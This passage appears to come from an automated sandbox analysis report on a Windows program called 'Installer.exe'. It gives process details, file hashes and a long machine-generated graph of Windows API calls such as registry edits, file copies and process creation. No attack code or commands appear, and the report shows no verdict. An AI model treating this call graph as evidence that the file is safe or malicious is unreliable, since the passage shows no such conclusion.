                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:33
                                                              Start time:10:44:50
                                                              Start date:30/10/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"Installer.exe"
                                                              Imagebase:0xe40000
                                                              File size:625'464 bytes
                                                              MD5 hash:89A069871324D35E25922F6FB881D514
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:17.8%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:20.7%
                                                                Total number of Nodes:1526
                                                                Total number of Limit Nodes:34
                                                                execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 